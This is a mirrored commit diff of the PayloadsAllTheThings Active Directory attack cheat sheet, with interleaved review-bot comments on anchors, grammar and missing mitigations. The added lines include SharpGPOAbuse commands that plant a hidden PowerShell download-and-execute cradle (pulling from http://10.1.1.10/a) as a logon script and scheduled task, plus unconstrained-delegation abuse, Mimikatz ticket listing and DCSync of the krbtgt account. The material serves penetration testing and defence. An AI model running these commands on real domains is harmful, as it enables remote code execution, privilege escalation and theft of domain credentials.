mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Kerberos AD GPO
This commit is contained in:
parent
b052f78d95
commit
73abdeed71
1 changed files with 40 additions and 6 deletions
|
@ -10,6 +10,7 @@
|
||||||
- [Open Shares](#open-shares)
|
- [Open Shares](#open-shares)
|
||||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||||
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
||||||
|
- [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
|
||||||
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
||||||
- [Using ndtsutil](#using-ndtsutil)
|
- [Using ndtsutil](#using-ndtsutil)
|
||||||
- [Using Vshadow](#using-vshadow)
|
- [Using Vshadow](#using-vshadow)
|
||||||
|
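Review bot: the new entry's anchor `#exploit-group-policy-objects-gpo` matches the `### Exploit Group Policy Objects GPO` heading this commit adds, so that link resolves; the neighbouring context line `#passwords-in-sysvol-&-group-policy-preferences` does not, because GitHub drops `&` when slugging a heading and yields `#passwords-in-sysvol--group-policy-preferences` (two hyphens). Worth fixing while this list is being touched.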
@ -47,13 +48,13 @@
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
- [Unconstrained delegation](#unconstrained-delegation)
|
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
|
||||||
- [Find delegation](#find-delegation)
|
- [Find delegation](#find-delegation)
|
||||||
- [Monitor with Rubeus](#monitor-with-rubeus)
|
- [Monitor with Rubeus](#monitor-with-rubeus)
|
||||||
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
|
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
|
||||||
- [Load the ticket](#load-the-ticket)
|
- [Load the ticket](#load-the-ticket)
|
||||||
- [Mitigation](#mitigation)
|
- [Mitigation](#mitigation)
|
||||||
- [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||||
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||||
- [PrivExchange attack](#privexchange-attack)
|
- [PrivExchange attack](#privexchange-attack)
|
||||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||||
|
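Review bot: the two renamed TOC entries point at `#kerberos-unconstrained-delegation` and `#kerberos-resource-based-constrained-delegation`, which match the renamed headings, but the old slugs `#unconstrained-delegation` and `#resource-based-constrained-delegation` were linkable before this commit and any inbound link to them will now silently land at the top of the page. Either keep the old names reachable or call the rename out in the commit message, which currently reads only "Kerberos AD GPO".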
@ -389,6 +390,23 @@ Get-NetGPOGroup
|
||||||
* Delete existing GPP xml files in SYSVOL containing passwords.
|
* Delete existing GPP xml files in SYSVOL containing passwords.
|
||||||
* Don’t put passwords in files that are accessible by all authenticated users.
|
* Don’t put passwords in files that are accessible by all authenticated users.
|
||||||
|
|
||||||
|
### Exploit Group Policy Objects GPO
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Adding User Rights
|
||||||
|
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
# Adding a Local Admin
|
||||||
|
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
# Configuring a User or Computer Logon Script
|
||||||
|
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
||||||
|
|
||||||
|
# Configuring a Computer or User Immediate Task
|
||||||
|
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Dumping AD Domain Credentials
|
### Dumping AD Domain Credentials
|
||||||
|
|
||||||
You will need the following files to extract the ntds :
|
You will need the following files to extract the ntds :
|
||||||
|
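Review bot: the new `### Exploit Group Policy Objects GPO` section is four commands with no prose. Unlike the neighbouring sections it states neither the prerequisite (the caller must already hold edit rights on "Vulnerable GPO" for any of these to work) nor a `#### Mitigation` subsection of the kind the delegation sections carry; one line on each would bring it in line with the rest of the file, and the mitigation could simply be to audit which principals hold write access on GPOs linked to privileged OUs. Two smaller points in the block: the comment `# Configuring a User or Computer Logon Script` pairs `--AddUserScript` with a file named `StartupScript.bat`, which reads as a startup script rather than a logon script, and the `# Adding User Rights` example grants `SeTakeOwnershipPrivilege`, whose impact (taking ownership of any securable object on the targeted hosts) deserves a sentence since the heading says nothing about what the reader is escalating to.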
@ -1011,6 +1029,12 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
|
||||||
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
|
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Trust relationship between domains
|
### Trust relationship between domains
|
||||||
|
|
||||||
|
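Review bot: grammar in the added sentence: "Check ACL for an User" should read "Check the ACL for a user". The ADACLScan example is also dropped in without saying what it answers; since it directly follows the `-Rights DCSync` lines, one sentence noting that `-EffectiveRightsPrincipal User1` combined with the `(&(AdminCount=1))` filter reports what User1 can effectively do against AdminSDHolder-protected objects, which is exactly how a defender would verify the ACL edits shown above, would tie the two blocks together.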
@ -1047,10 +1071,17 @@ Prerequisite:
|
||||||
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Unconstrained delegation
|
### Kerberos Unconstrained Delegation
|
||||||
|
|
||||||
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||||
|
|
||||||
|
Domain Compromise via DC Print Server and Unconstrained Delegation
|
||||||
|
|
||||||
|
Prerequisites:
|
||||||
|
- Object with Property "Trust this computer for delegation to any service (Kerberos only)"
|
||||||
|
- Must have ADS_UF_TRUSTED_FOR_DELEGATION
|
||||||
|
- Must not have ADS_UF_NOT_DELEGATED flag
|
||||||
|
|
||||||
#### Find delegation
|
#### Find delegation
|
||||||
|
|
||||||
Check the `TrustedForDelegation` property.
|
Check the `TrustedForDelegation` property.
|
||||||
|
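Review bot: the added line "Domain Compromise via DC Print Server and Unconstrained Delegation" reads as a title but is followed by neither a link nor a sentence; either cite the source it is taken from or turn it into a sentence. In the Prerequisites list the first two bullets state one condition twice, since ticking "Trust this computer for delegation to any service (Kerberos only)" is what sets ADS_UF_TRUSTED_FOR_DELEGATION on the object, so merge them; and a prerequisite is missing, namely that the Print Spooler must be running on the DC, which the `Disable the Print Spooler Service` mitigation further down already presupposes.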
@ -1097,7 +1128,9 @@ Extract the base64 TGT from Rubeus output and load it to our current session.
|
||||||
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
||||||
```
|
```
|
||||||
|
|
||||||
Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt`
|
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
|
||||||
|
|
||||||
|
Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
|
||||||
|
|
||||||
|
|
||||||
#### Mitigation
|
#### Mitigation
|
||||||
|
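Review bot: the added sentence sits between the Rubeus `asktgs` block and the DCSync step, so the procedure now reads Rubeus, then "alternatively Mimikatz", then DCSync; placing the alternative after the DCSync line, or in the earlier "Monitor with Rubeus" step where the ticket is actually captured, keeps the main path linear. Also, `sekurlsa::tickets` as written only lists the tickets held in LSASS, while the sentence says "grab the ticket"; say "list" or refer to the export variant the tool documents. The prompt change from `Mimikatz>` to `mimikatz #` is consistent with the new line, good.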
@ -1105,7 +1138,7 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
|
||||||
* Ensure sensitive accounts cannot be delegated
|
* Ensure sensitive accounts cannot be delegated
|
||||||
* Disable the Print Spooler Service
|
* Disable the Print Spooler Service
|
||||||
|
|
||||||
### Resource-Based Constrained Delegation
|
### Kerberos Resource Based Constrained Delegation
|
||||||
|
|
||||||
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||||||
|
|
||||||
|
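Review bot: the renamed heading "Kerberos Resource Based Constrained Delegation" drops the hyphen that the unchanged sentence directly below it ("Resource-based Constrained Delegation was introduced in Windows Server 2012") and Microsoft's own name for the feature keep; use "Resource-Based" in the heading and in the matching TOC entry so the term is spelled one way, and note that `#resource-based-constrained-delegation` was a linkable slug before this commit.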
@ -1469,4 +1502,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||||
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
||||||
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
||||||
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||||
|
* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
|
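Review bot: the new reference writes the month as "APRIL 2, 2018" in capitals while every other entry in the list uses the "Jun 11, 2019" / "October 30, 2017" style; write "April 2, 2018". While this list is open, two context entries carry broken URLs: `https:/www.sqlshack.com/...` is missing a slash and `pentestlab.blog/2017/12/13/...` has no scheme, so neither renders as a working link.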